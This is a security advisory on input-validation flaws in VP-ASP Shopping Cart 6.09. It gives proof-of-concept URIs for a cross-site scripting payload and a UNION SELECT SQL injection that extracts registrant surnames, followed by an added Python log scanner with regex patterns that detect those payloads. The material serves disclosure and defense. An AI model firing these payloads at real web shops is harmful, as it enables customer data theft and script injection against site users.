Title VP-ASP Shopping Cart Multiple Input Validation Vulnerabilities
Published 2007-01-11-12:00AM
Updated 2007-01-12-05:50PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  ajann is credited with the discovery of these vulnerabilities.
Vulnerable  VPASP Shopping Cart 6.09
Not Vulnerable  
Code   To exploit a cross-site scripting issue:

An attacker can exploit this issue by enticing an unsuspecting user into following a malicious URI.

The following proof-of-concept URI is available:

http://example.com/[path]/shopcustadmin.asp?msg=%3Cscript%3Ealert('x');%3C/script%3E

To exploit an SQL-injection issue:

An attacker can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://example.com/[path]/shopgiftregsearch.asp?LoginLastname='%20union%20select%200,lastname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1
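
A defender-side check for the two requests above, added here as an example and not part of the original advisory: it scans web server log lines for the `msg` parameter of shopcustadmin.asp and the `LoginLastname` parameter of shopgiftregsearch.asp and flags script markup or UNION SELECT payloads. The log field layout, the regex heuristics and the sample lines (the second PoC abbreviated) are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Script name -> (parameter, issue class), taken from the two PoC URIs above.
WATCHED = {
    "shopcustadmin.asp": ("msg", "xss"),
    "shopgiftregsearch.asp": ("loginlastname", "sqli"),
}

# Heuristic patterns chosen for this example; tune them against real traffic.
PATTERNS = {
    "xss": re.compile(r"<\s*/?\s*script\b|\bon\w+\s*=|javascript\s*:", re.I),
    "sqli": re.compile(r"\bunion\s+(?:all\s+)?select\b|'\s*(?:or|and)\b.*=|--", re.I),
}

def classify(stem, query):
    """Return 'xss', 'sqli' or None for one request (URI stem + raw query)."""
    script = unquote(stem).rsplit("/", 1)[-1].lower()
    if script not in WATCHED:
        return None
    param, issue = WATCHED[script]
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() == param and PATTERNS[issue].search(value):
            return issue
    return None

def scan(log_lines):
    """Return (client_ip, issue, stem) for flagged lines; skips '#' directives."""
    hits = []
    for line in log_lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue
        _date, _time, ip, _method, stem, query, _status = fields[:7]
        issue = classify(stem, "" if query == "-" else query)
        if issue:
            hits.append((ip, issue, stem))
    return hits

# Constructed sample log, not real traffic.
SAMPLE = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2007-01-12 10:01:02 192.0.2.10 GET /shop/shopcustadmin.asp msg=%3Cscript%3Ealert('x');%3C/script%3E 200",
    "2007-01-12 10:01:09 192.0.2.11 GET /shop/shopcustadmin.asp msg=Password+updated 200",
    "2007-01-12 10:02:30 192.0.2.12 GET /shop/shopgiftregsearch.asp LoginLastname='%20union%20select%200,lastname,0%20from%20registrant%20where%20'1=1 200",
    "2007-01-12 10:02:41 192.0.2.13 GET /shop/shopgiftregsearch.asp LoginLastname=O'Brien 200",
    "2007-01-12 10:03:00 192.0.2.14 GET /shop/default.asp - 200",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The legitimate surname containing an apostrophe and the plain status message are not flagged, which is why the SQL pattern keys on `union select` and boolean tautologies instead of any single quote.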
Copyright 2007, SecurityDot